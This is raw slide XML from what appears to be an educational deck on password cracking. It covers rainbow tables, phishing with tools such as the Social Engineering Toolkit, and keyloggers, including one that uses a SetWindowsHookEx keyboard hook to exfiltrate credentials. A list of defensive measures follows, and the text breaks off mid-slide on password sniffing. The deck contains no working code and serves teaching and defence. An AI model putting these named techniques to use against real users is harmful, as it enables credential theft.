                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FD81A1-B487-659C-1E36-16E6F9FD2E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6344" y="220333"/>
            <a:ext cx="4648200" cy="2369538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Screen Recording 2025-11-12 192928">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ADEBD8E-6FDC-E7CF-6A0D-ECAC94BDF01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069149" y="2599411"/>
            <a:ext cx="5074851" cy="2544089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A7CD1C-B14A-5B0F-F759-BCFAF6BDEC89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632619" y="2647950"/>
            <a:ext cx="3345056"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Fig., 03/ demonstration of RT creation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDC5184-15B7-1357-E891-3BA7062E18AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="2020869"/>
            <a:ext cx="3345056"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Fig., 04/ demonstration of hash cracking through RT hash indexing procedure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128937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74"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49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672B1386-25D4-425B-8D0B-54EFB2C259E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F248A5-3110-4C5E-BEAC-4217B93EC709}"/>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Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{05F648C3-39C7-4B0C-84BC-AF46EE6E37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A0F9EB-AF4E-4FC9-B361-04A0A5C0D9C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Phishing attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Phishing is a form of social engineering and a scam where attackers deceive people into revealing sensitive information or installing malware such as viruses, worms, adware, or ransomware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Phishing involves tricking users into providing their passwords by posing as a legitimate entity, such as a bank or a social media platform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Phishing attacks often use deceptive emails, websites, or messages to trick users into entering their login credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g., Use something like Social Engineering Toolkit (SET) on Kali, or a simulated phishing-platform environment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{62475EED-FA93-4B5C-86ED-973630FED0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ED19D4-4EFD-40A6-B835-3D4B1E21C775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{C79D031D-F597-4CD1-8893-97767C7BCE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6307A06-25D9-47B7-9B4B-B9A776D39FCC}"/>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EE13CAF9-47BB-4F1B-B009-477E00A171BD}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{C6F4165A-8225-40F8-890E-E735CED432E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F5A77F2-5D20-4F99-A546-2A481632036C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3668725"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Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{528175B1-95BF-479A-B52F-A49CEC2F83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F050E25-2891-4E20-9EA8-D56E096B8E3D}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{359EE4F5-9304-4ED7-9994-76BAC0BD12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5840CA-D8D3-4767-A49F-6BE364ABD03C}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{825B799E-189E-4A4F-873B-19F3D02E4D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311C4C-745B-4CC6-92EE-3D3AD2F357C4}"/>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90495F9E-CF62-40BF-87CA-6959F67FEC1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3A429C54-440B-0926-E3FA-69BF194FD5DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0AB5CA20-2328-444F-A6F3-BAAF5E99577B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DEFCC9-321F-8B2D-D720-B9F63D927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024" y="285750"/>
            <a:ext cx="7583951" cy="27193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08575F-8DB1-2E31-A232-4BC926D9C17C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2899471" y="3146614"/>
            <a:ext cx="3345056"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Fig., 04/ practical representation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>phising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> through tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>`dynamite`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1853813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23FD50E7-9280-4265-A557-330922C378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7F9C8FD-620C-4C10-9798-1016A72DDC23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390648" y="1190501"/>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Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{E58CBBDB-355A-4177-ACCB-899C881989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71B810-351D-46B5-A594-9221AB860C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Keylogging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Keystroke logging, often referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>keylogging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> or keyboard capturing, is the action of recording (logging) the keys pressed on a keyboard, typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> are malicious software or hardware that record keystrokes on a computer or device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Attackers can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> to capture passwords as users type them, without their knowledge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g., A malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> installs a global keyboard hook via SetWindowsHookEx(WH_KEYBOARD_LL) to capture every keystroke and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> credentials.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{CD1AF5E3-80B5-4712-A3DA-6D99FE7807F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A677EA-6726-4537-B730-24CC753B0CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{CC160188-6A29-4C8B-BD03-5899337CF8B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7BCF47D-560D-4049-B2EC-7DEB22D25109}"/>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DD045177-9C21-4E9C-B4C7-5D72FB55D5E8}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{EC10CF3F-BAFC-4B40-ACC0-41BE258E575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21432AB-C841-4600-AAB8-6CBC4741400C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3668725"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Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{5AC50F56-3C46-467D-97E6-0C0C32B560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3CB030-6159-42C4-8218-085DA9D6FA27}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{99B80C28-D34F-4C2A-8434-98EE62457FD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10241E8-E52E-4B4C-8594-B851495AB3C6}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{96BE040F-F481-4479-8710-2B35B9E1946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8559235-C90F-4DA8-91AF-1FEC1D616E9D}"/>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1E5A07DF-1A73-40B0-BD3D-ECD2FA94D32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E2AE7562-2B5E-40C4-8E14-F41C9DFE8A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0955E4-253B-4AC4-9988-DEF2D7683949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390648" y="1190501"/>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Safety Measures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{931AB209-FCC2-4183-A385-FD2A81F723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AEF8CBF-E45D-4589-BDCC-5F84A14E3A51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Use long, randomly generated passphrases (e.g., ≥ 12 characters, mix of upper/lower case, numbers &amp; symbols) rather than simple words or predictable patterns.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Enable Multi-Factor Authentication (MFA) for all accounts, so that even if a password is cracked, the attacker still lacks the second factor.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Do not reuse passwords across different accounts — unique credentials mean a cracked password won’t cascade into other systems.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Limit login attempts and apply rate-limiting or account lock-out after a few failed tries, to inhibit brute force or dictionary attacks.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Ensure passwords (and their hashes) are stored and transmitted securely: use strong hashing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>/Argon2), unique salts, and always use encrypted channels (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>/SSH). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Monitor for credential leaks (breach notifications), enable alerts on suspicious login activity, and force password changes when a compromise is suspected.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{525C251C-02AF-41BB-B931-F5A696BB2F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CFE298D-D14B-4A85-A015-0FF3653B4F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{6A599948-6C40-4571-8214-CF15F73874E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452A56B-1E70-4485-8323-6EDD8F93B987}"/>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FDAD32AD-4448-4BA8-9955-3D9D2577613D}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{4EEB5E1A-73B8-4FAA-A804-41BEB0ECFA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66977F0-8DCF-4B43-94BA-3BB835FE1E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3668725"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Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{F9BEFFF0-2C1F-4C2F-8B89-D200EED36E8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50CB3D-63D3-4B71-8DE2-B86843383EAA}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{A5877C0B-0967-4727-B7C3-B2B9B2D3FC9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DB815A6-B6FA-4E01-8438-2AD1F8D9D80E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="38810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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{2B301392-FF77-47BE-9A01-BD22961913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FBACF1-3D13-4460-A770-FB49A344CFED}"/>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368539E7-3775-4C0B-9346-DA182E520DA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E442E9CE-CCEB-494D-976D-B19F05C1A80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E93A8EB-A177-4306-B14D-AB796C58E449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390648" y="1190501"/>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Password Sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{1F7802DD-D194-4F08-ABB7-72A569BC64F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097FEC-E293-40D6-8B2C-A005387624BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Password sniffing is a network attack where an attacker intercepts data packets to capture passwords. This is typically done using tools that monitor network traffic without altering it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
